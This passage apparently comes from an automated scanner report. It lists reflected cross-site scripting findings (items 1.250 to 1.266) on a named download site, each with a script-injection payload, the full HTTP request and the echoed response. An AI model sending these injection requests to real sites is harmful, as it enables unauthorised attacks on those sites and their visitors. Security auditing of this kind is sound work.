The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2edda"><script>alert(1)</script>53ca7435637 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html2edda"><script>alert(1)</script>53ca7435637 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:20:48 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55393

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html2edda"><script>alert(1)</script>53ca7435637"/>
...[SNIP]...

1.251. http://www.x64bitdownload.com/downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a540c"><script>alert(1)</script>1b11e322301 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html?a540c"><script>alert(1)</script>1b11e322301=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:17:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html?a540c"><script>alert(1)</script>1b11e322301=1"/>
...[SNIP]...

1.252. http://www.x64bitdownload.com/downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2aaf8"><script>alert(1)</script>29f62c52533 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads2aaf8"><script>alert(1)</script>29f62c52533/t-64-bit-nokia-ovi-suite-download-bhfheplp.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:25:02 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21332

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloads2aaf8"><script>alert(1)</script>29f62c52533/t-64-bit-nokia-ovi-suite-download-bhfheplp.html" />
...[SNIP]...

1.253. http://www.x64bitdownload.com/downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef19c"><script>alert(1)</script>53099d9c0ac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.htmlef19c"><script>alert(1)</script>53099d9c0ac HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:25:57 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.htmlef19c"><script>alert(1)</script>53099d9c0ac"/>
...[SNIP]...

1.254. http://www.x64bitdownload.com/downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5920"><script>alert(1)</script>1d30e1ca09f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html?b5920"><script>alert(1)</script>1d30e1ca09f=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:21:30 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html?b5920"><script>alert(1)</script>1d30e1ca09f=1"/>
...[SNIP]...

1.255. http://www.x64bitdownload.com/downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb7c1"><script>alert(1)</script>cb83eacf673 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloadseb7c1"><script>alert(1)</script>cb83eacf673/t-64-bit-nokia-pc-suite-download-psjkkdil.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:20:22 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21331

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloadseb7c1"><script>alert(1)</script>cb83eacf673/t-64-bit-nokia-pc-suite-download-psjkkdil.html" />
...[SNIP]...

1.256. http://www.x64bitdownload.com/downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8f68"><script>alert(1)</script>c04ad26948f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.htmld8f68"><script>alert(1)</script>c04ad26948f HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:21:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57543

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.htmld8f68"><script>alert(1)</script>c04ad26948f"/>
...[SNIP]...

1.257. http://www.x64bitdownload.com/downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38ef3"><script>alert(1)</script>3ee45597a1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html?38ef3"><script>alert(1)</script>3ee45597a1a=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:18:06 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html?38ef3"><script>alert(1)</script>3ee45597a1a=1"/>
...[SNIP]...

1.258. http://www.x64bitdownload.com/downloads/t-64-bit-oovoo-download-jrletedp.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-oovoo-download-jrletedp.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14448"><script>alert(1)</script>41f24c0c9a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads14448"><script>alert(1)</script>41f24c0c9a/t-64-bit-oovoo-download-jrletedp.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:23:38 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21321

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloads14448"><script>alert(1)</script>41f24c0c9a/t-64-bit-oovoo-download-jrletedp.html" />
...[SNIP]...

1.259. http://www.x64bitdownload.com/downloads/t-64-bit-oovoo-download-jrletedp.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-oovoo-download-jrletedp.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26ff1"><script>alert(1)</script>4d559d8a948 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-oovoo-download-jrletedp.html26ff1"><script>alert(1)</script>4d559d8a948 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:48 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-oovoo-download-jrletedp.html26ff1"><script>alert(1)</script>4d559d8a948"/>
...[SNIP]...

1.260. http://www.x64bitdownload.com/downloads/t-64-bit-oovoo-download-jrletedp.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-oovoo-download-jrletedp.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1d51"><script>alert(1)</script>4f51ebb208e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-oovoo-download-jrletedp.html?e1d51"><script>alert(1)</script>4f51ebb208e=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:20:20 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60503

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-oovoo-download-jrletedp.html?e1d51"><script>alert(1)</script>4f51ebb208e=1"/>
...[SNIP]...

1.261. http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-ozum-download-lhtivuds.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37801"><script>alert(1)</script>ad83e3f4619 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads37801"><script>alert(1)</script>ad83e3f4619/t-64-bit-ozum-download-lhtivuds.html HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 14:59:17 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: downloadsite=td6rkej4n5bvmqp9ffd7osao76; expires=Sat, 23 Jul 2011 14:59:17 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21321

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloads37801"><script>alert(1)</script>ad83e3f4619/t-64-bit-ozum-download-lhtivuds.html" />
...[SNIP]...

1.262. http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-ozum-download-lhtivuds.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47648"><script>alert(1)</script>f734d0ee91b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-ozum-download-lhtivuds.html47648"><script>alert(1)</script>f734d0ee91b HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:59:20 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: downloadsite=fof603f2p2pdrhm2a7rhh57a41; expires=Sat, 23 Jul 2011 14:59:20 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57137

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-ozum-download-lhtivuds.html47648"><script>alert(1)</script>f734d0ee91b"/>
...[SNIP]...

1.263. http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-ozum-download-lhtivuds.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 850ca"><script>alert(1)</script>6fff343f0ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-ozum-download-lhtivuds.html?850ca"><script>alert(1)</script>6fff343f0ed=1 HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:59:04 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: downloadsite=d6q73p3k9jss96dppl7irlv675; expires=Sat, 23 Jul 2011 14:59:04 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57143

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-ozum-download-lhtivuds.html?850ca"><script>alert(1)</script>6fff343f0ed=1"/>
...[SNIP]...

1.264. http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html/x22 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-ozum-download-lhtivuds.html/x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3db1"><script>alert(1)</script>51fa849155c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloadsa3db1"><script>alert(1)</script>51fa849155c/t-64-bit-ozum-download-lhtivuds.html/x22 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:18:39 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloadsa3db1"><script>alert(1)</script>51fa849155c/t-64-bit-ozum-download-lhtivuds.html/x22" />
...[SNIP]...

1.265. http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html/x22 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-ozum-download-lhtivuds.html/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d982"><script>alert(1)</script>b02d30346b5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-ozum-download-lhtivuds.html1d982"><script>alert(1)</script>b02d30346b5/x22 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:19:36 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-ozum-download-lhtivuds.html1d982"><script>alert(1)</script>b02d30346b5/x22"/>
...[SNIP]...

1.266. http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html/x22 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-ozum-download-lhtivuds.html/x22

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 683a4"><script>alert(1)</script>5d118b29aed was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-ozum-download-lhtivuds.html/x22683a4"><script>alert(1)</script>5d118b29aed HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:20:12 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
